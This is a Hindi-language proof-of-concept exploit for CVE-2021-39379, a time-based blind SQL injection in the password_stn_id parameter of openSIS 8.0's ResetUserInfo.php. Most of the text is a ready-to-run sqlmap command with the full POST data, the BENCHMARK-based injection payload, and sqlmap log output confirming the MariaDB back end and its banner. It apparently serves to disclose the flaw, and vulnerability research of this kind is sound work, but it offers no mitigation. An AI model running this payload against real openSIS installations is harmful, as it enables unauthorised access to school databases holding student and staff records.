
CVE-2021-39379 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो openSIS 8.0 में ResetUserInfo.php के password_stn_id पैरामीटर के माध्यम से SQL इंजेक्शन भेद्यता है, जो MySQL/MariaDB के विरुद्ध समय-आधारित ब्लाइंड SQLi को सक्षम बनाता है।
openSIS संस्करण 8.0 में SQL इंजेक्शन भेद्यता मौजूद है जब MySQL (MariaDB) को अनुप्रयोग डेटाबेस के रूप में उपयोग किया जा रहा हो। एक दुर्भावनापूर्ण हमलावर कमजोर password_stn_id पैरामीटर के माध्यम से MySQL (MariaDB) डेटाबेस को SQL कमांड जारी कर सकता है।
असुरक्षित PHP पृष्ठ:
ResetUserInfo.php
असुरक्षित पेलोड
sqlmap -u "http://localhost:8081/ResetUserInfo.php" --data="pass_user_type=pass_student&pass_type_form=password&password_stn_id=1234&uname=1234&month_password_dob=08&day_password_dob=01&year_password_dob=2021&pass_email=&password_stf_email=" --referer="http://localhost:8081/ForgotPass.php?language=en" --dbms="MySQL" --level=3 --risk=3 --banner --answers="crack=N,dict=N,continue=Y,quit=N"
SQL इंजेक्शन:
http://localhost:8081/ResetUserInfo.php
Parameter: password_stn_id (POST)
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: pass_user_type=pass_student&pass_type_form=password&password_stn_id=1234 AND 1211=BENCHMARK(5000000,MD5(0x6a65474d))&uname=1234&month_password_dob=08&day_password_dob=01&year_password_dob=2021&pass_email=&password_stf_email=
[21:11:37] [INFO] testing MySQL
[21:11:44] [INFO] confirming MySQL
[21:11:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:11:56] [INFO] the back-end DBMS is MySQL
[21:11:56] [INFO] fetching banner
[21:11:56] [INFO] retrieved: 10.5.11-MariaDB-1
web application technology: PHP 7.4.21
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.5.11-MariaDB-1'
Nathan Johnson द्वारा खोजा गया, अगस्त 2021